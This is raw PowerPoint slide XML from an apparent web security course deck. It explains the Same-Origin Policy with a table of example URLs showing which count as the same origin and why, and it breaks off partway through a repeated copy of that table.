        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2459504"/>
            <a:ext cx="8686800" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pillars of Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401417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7010400" cy="704060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same-Origin Policy and CORS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2099887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0482-A907-504B-9D4F-CFD3076D5A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What We’ll Cover in This Section: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB1F3676-8BEF-1246-983D-C6C20FCD5F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="8382000" cy="3477875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>- How browsers load all the files required for a given web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>- Where browsers are allowed to load resources from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>- How browsers determine where to send requests to get what they need to load a page, as well as security controls constraining where they're allowed to load them from.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1165832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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24707555-D2DE-47A6-A6E5-C76342C3AD05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="990600"/>
            <a:ext cx="8534400" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Two URLs have the same origin if:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If you load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, your browser can only request additional assets that live at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://example.com/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> load resources at, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>http://othersite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This prevents pages from loading malicious resources from foreign hosts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1916912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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same-Origin Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{976D524B-8BDA-4AAF-92C3-349145B8BD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1320619385"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="320866" y="1775460"/>
          <a:ext cx="8502269" cy="3307080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5004689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="207415187"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1465580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1465313309"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2032000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2157799146"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>URL</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Outcome</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Reason</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2611059990"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>http://store.company.com/dir2/other.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Same origin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Only the path differs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="479195705"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>http://store.company.com/dir/inner/another.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Same origin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Only the path differs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1530470432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>https://store.company.com/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Different protocol</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2653598629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>http://store.company.com:81/dir/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Different port (http:// is port 80 by default)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3664102755"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>http://news.company.com/dir/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Different host</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3084047732"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7920D1A7-79A6-4A60-B1D7-F29D4A2CA4A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2919657" y="5638800"/>
            <a:ext cx="3298852" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Table courtesy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C775E6F6-D418-4F5A-A25C-FFAEC8D0114D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586247" y="1143000"/>
            <a:ext cx="5971507" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Same-Origin Policy Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30477134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695CB0-3F72-47D6-96AC-99D64F6F623E}"/>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BAC7F3-1283-4AAC-8A8A-5DAA011AC547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36400" y="2590800"/>
            <a:ext cx="9071201" cy="2215991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The web is most organizations’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>largest attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4600" b="1" dirty="0">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68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79B4EDD-62C3-4C2B-A59E-7E4FB6118A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3274865023"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="187516" y="2494280"/>
          <a:ext cx="8768969" cy="3677920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5271389">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="207415187"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1465580">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1465313309"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2032000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2157799146"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>URL</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Outcome</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Reason</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2611059990"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>http://store.company.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>/dir2/other.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Same Origin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
